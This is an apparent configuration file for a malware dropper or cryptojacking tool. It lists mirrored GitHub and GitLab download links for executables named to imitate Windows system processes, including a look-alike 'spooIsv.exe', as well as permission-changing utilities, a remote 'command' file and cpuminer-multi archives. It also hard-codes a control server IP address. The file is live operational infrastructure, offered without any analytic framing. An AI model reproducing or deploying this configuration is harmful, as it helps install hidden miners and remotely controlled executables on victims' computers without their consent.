[links]
linkdownloadservices=https://gitlab.com/nguyennhatduy/test/raw/master/services.exe
linkdownloadservices1=https://github.com/nguyennhatduy2608/test/raw/master/services.exe
linksetacl=https://gitlab.com/nguyennhatduy/test/raw/master/SetACL.exe
linksetacl1=https://github.com/nguyennhatduy2608/test/raw/master/SetACL.exe
linkntrights=https://gitlab.com/nguyennhatduy/test/raw/master/ntrights.exe
linkntrights1=https://github.com/nguyennhatduy2608/test/raw/master/ntrights.exe
linkversion=https://gitlab.com/nguyennhatduy/test/raw/master/versiondao
linkversion1=https://github.com/nguyennhatduy2608/test/raw/master/versiondao
versionspoolsv=https://gitlab.com/nguyennhatduy/test/raw/master/versionspoolsv
versionspoolsv1=https://github.com/nguyennhatduy2608/test/raw/master/versionspoolsv
versiondllnew=https://gitlab.com/nguyennhatduy/test/raw/master/versiondllnew
versiondllnew1=https://github.com/nguyennhatduy2608/test/raw/master/versiondllnew
command=https://gitlab.com/nguyennhatduy/test/raw/master/command
command1=https://github.com/nguyennhatduy2608/test/raw/master/command
linkdownloadspoolsvx64=https://gitlab.com/nguyennhatduy/test/raw/master/spoolsvx64/spoolsv.exe
linkdownloadspoolsvx32=https://gitlab.com/nguyennhatduy/test/raw/master/spoolsvx32/spoolsv.exe
linkdownloadspoolsvx641=https://github.com/nguyennhatduy2608/test/raw/master/spoolsvx64/spoolsv.exe
linkdownloadspoolsvx321=https://github.com/nguyennhatduy2608/test/raw/master/spoolsvx32/spoolsv.exe
linkdownloadspooIsvx64=https://gitlab.com/nguyennhatduy/test/raw/master/crssx64/spooIsv.exe
linkdownloadspooIsvx32=https://gitlab.com/nguyennhatduy/test/raw/master/crssx32/spooIsv.exe
linkdownloadspooIsvx641=https://github.com/nguyennhatduy2608/test/raw/master/crssx64/spooIsv.exe
linkdownloadspooIsvx321=https://github.com/nguyennhatduy2608/test/raw/master/crssx32/spooIsv.exe
linkdownloadsystemsx64=https://gitlab.com/nguyennhatduy/test/raw/master/Systemsx64/Systems.exe
linkdownloadsystemsx32=https://gitlab.com/nguyennhatduy/test/raw/master/Systemsx32/Systems.exe
linkdownloadsystemsx641=https://github.com/nguyennhatduy2608/test/raw/master/systemsx64/Systems.exe
linkdownloadsystemsx321=https://github.com/nguyennhatduy2608/test/raw/master/systemsx32/Systems.exe
linkdllx64=https://github.com/nguyennhatduy2608/test/raw/master/cpuminerx64/cpuminer-multi.zip
linkdllx32=https://github.com/nguyennhatduy2608/test/raw/master/cpuminerx32/cpuminer-multi.zip
linkdllx641=https://gitlab.com/nguyennhatduy/test/raw/master/cpuminerx64/cpuminer-multi.zip
linkdllx321=https://gitlab.com/nguyennhatduy/test/raw/master/cpuminerx32/cpuminer-multi.zip
[config]
information=yes
ipserver=66.42.53.57
